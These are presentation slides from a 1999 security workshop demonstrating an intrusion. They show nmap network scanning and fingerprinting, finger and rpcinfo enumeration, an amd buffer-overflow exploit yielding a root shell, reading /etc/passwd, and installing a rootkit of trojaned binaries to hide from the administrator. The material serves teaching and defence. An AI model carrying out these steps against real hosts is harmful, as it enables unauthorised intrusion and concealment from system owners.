Intrusion demonstration Part I Postech PLUS Taeho Oh (PLUS015) ohhara@postech.edu 3rd CONCERT Workshop Nov. 1999 Taeho Oh/PLUS Contents • Scan wide area network – Using powerful network scanner, nmap – Find the running hosts in the network – Gather the host information • Get root permission from the target host • Hide himself from the admin 3rd CONCERT Workshop Nov. 1999 Taeho Oh/PLUS Scan wide area network (1) • Using powerful network scanner, nmap – nmap can do ftp bounce scan, stealth scan, OS prediction, and so on. – http://www.insecure.org/nmap 3rd CONCERT Workshop Nov. 1999 Taeho Oh/PLUS Scan wide area network (2) • Find the running hosts in the network [ root@ohhara ~ ] {1} # nmap -sP "141.223.xxx.*" Host (141.223.xxx.0) appears to be up. Host (141.223.xxx.0) seems to be a subnet broadcast address (returned 111 extra pings). Skipping host. Host kwxnxoo.postech.ac.kr (141.223.xxx.7) appears to be up. Host xojx.postech.ac.kr (141.223.xxx.9) appears to be up. ( . . . ) Host victim.postech.ac.kr (141.223.xxx.75) appears to be up. Host xstxos.postech.ac.kr (141.223.xxx.77) appears to be up. Host anxelx.postech.ac.kr (141.223.xxx.78) appears to be up. Host mxrlxns.postech.ac.kr (141.223.xxx.79) appears to be up. Host (141.223.xxx.99) appears to be up. Host (141.223.xxx.255) appears to be up. Host (141.223.xxx.255) seems to be a subnet broadcast address (returned 93 extra pings). Skipping host. Nmap run completed -- 256 IP addresses (27 hosts up) scanned in 2 seconds 3rd CONCERT Workshop Nov. 1999 Taeho Oh/PLUS Scan wide area network (3) • Gather the host information [ root@ohhara ~ ] {2} # nmap -I -O 141.223.121.75 Interesting ports on victim.postech.ac.kr (141.223.xxx.75): Port State Protocol Service Owner 21 open tcp ftp root 23 open tcp telnet root 25 open tcp smtp root 53 open tcp domain root 79 open tcp finger root 80 open tcp http nobody ( . . . ) 6000 open tcp X11 root TCP Sequence Prediction: Class=random positive increments Difficulty=2098031 (Good luck!) Remote operating system guess: Linux 2.1.122 - 2.1.132; 2.2.0-pre1 2.2.2 Nmap run completed -- 1 IP address (1 host up) scanned in 19 seconds 3rd CONCERT Workshop Nov. 1999 Taeho Oh/PLUS Scan wide area network (4) • Gather the host information [ root@ohhara ~ ] {3} # [141.223.xxx.75] Login Name Phone kotaeji Kim Taehyung [ root@ohhara ~ ] {4} # program vers proto 100000 2 tcp 100000 2 udp ( . . . ) 100021 1 udp 100021 3 udp 100021 1 tcp 100021 3 tcp 300019 1 tcp 300019 1 udp finger @141.223.xxx.75 Tty Idle Login Time Office Office /0 20:46 Oct 27 19:41 rpcinfo -p 141.223.xxx.75 port 111 rpcbind 111 rpcbind 1026 1026 1024 1024 878 879 3rd CONCERT Workshop Nov. 1999 nlockmgr nlockmgr nlockmgr nlockmgr amd amd Taeho Oh/PLUS Get root permission from the target host • Get root with amd buffer overflow exploit [ root@ohhara ~ ] {5} # ./amd-ex 141.223.xxx.75 Attack 141.223.xxx.75 amq: could not start new autmount point: Connection timed out Connect to the shell Linux victim 2.2.5-22 #1 Wed Jun 2 09:17:03 EDT 1999 i686 unknown uid=0(root) gid=0(root) id uid=0(root) gid=0(root) cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown ( . . . ) 3rd CONCERT Workshop Nov. 1999 Taeho Oh/PLUS Hide himself from the admin • Install rootkit [ root@victim ~ ] {1} # tar -xzf ohhara-rootkit.tar.gz [ root@victim ~ ] {2} # cd ohhara-rootkit [ root@victim ~/ohhara-rootkit ] {3} # ./install-ohhara-rootkit • Trojan files of ohhara rootkit – chgrp, chmod, chown, cp, ln, ls, mkdir, mknod, netstat, ps, touch, dir, du, find, mkfifo, oldps, top, vdir, fixdate, in.inetd, in.smbd, in.telnetd, pam.pwdb.so 3rd CONCERT Workshop Nov. 1999 Taeho Oh/PLUS